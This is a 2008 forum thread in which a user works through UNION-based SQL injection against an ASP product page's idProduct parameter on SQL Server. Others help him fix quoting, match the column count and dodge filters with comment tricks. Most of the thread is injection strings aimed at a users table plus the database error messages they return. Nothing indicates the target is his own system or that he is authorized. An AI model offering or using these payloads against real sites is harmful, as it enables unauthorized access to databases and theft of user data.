When testing sql injection with this command:
?idProduct=-1+UNION+SELECT+1,2+FROM+users--
I am getting this error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'UNION'.
/productdisplay.asp, line 36
I have tried adding a quotation mark before UNION, but get another error message on unclosed quotation marks. What I think I should be aiming for is to get the "must have equal expression of target sites" error message. Can anyone help me out?
March 30th, 2008, 09:24 PM
oofki
Well I can tell you that I highly doubt they are using columns named 1 and 2. Thats what you are telling it to do :-P
March 30th, 2008, 11:36 PM
shad0w7
Yeah i know that, but I'm expecting to get the "must have equal number of expressions" error message. Then just add numbers 3,4,5.... until there's no error message.Then I'll substitute in column names after that.
March 31st, 2008, 12:43 AM
oofki
Im saying what you are essentially doing is writing a query that says:
SELECT 1,2 FROM users
but it need to look like:
Select CollumnNameA,CollumnNameB From Users where UserID = 1,2
March 31st, 2008, 02:10 PM
nebulus200
Not necessarily, the only thing that matters is that the # of columns matches and that the type is correct...
If I had to guess I'd say there is possibly an issue with a quote somewhere...the other thing that looks odd is the negative product number...are you sure that isn't wigging it out?
March 31st, 2008, 02:43 PM
shad0w7
yeah i just added the -1 because I've noticed in the past that it normally works, but I tried without the negative and its the same error.
March 31st, 2008, 02:50 PM
nebulus200
My best guess would be something to the effect of :
Since it is choking on the union, my thought is it has to be something with the argument to idProduct and how the script is enclosing it in the subsequent SQL query...
March 31st, 2008, 05:21 PM
shad0w7
Ok, with this injection:
1'+UNION+SELECT+(1,2)+FROM+users--
i get:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' UNION SELECT (1,2) FROM users--'.
/productdisplay.asp, line 36
and with this: 1''+UNION+SELECT+(1,2)+FROM+users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ''.
/productdisplay.asp, line 36
March 31st, 2008, 05:47 PM
nebulus200
What does:
'+UNION+SELECT+(1,2)+FROM+users--
''+UNION+SELECT+(1,2)+FROM+users--
return? Note: no numeric argument there and the second is two '
or
1+UNION+SELECT+1,2+FROM+users/*
or
1/**/UNION/**/1,2/**/FROM/**/users/*
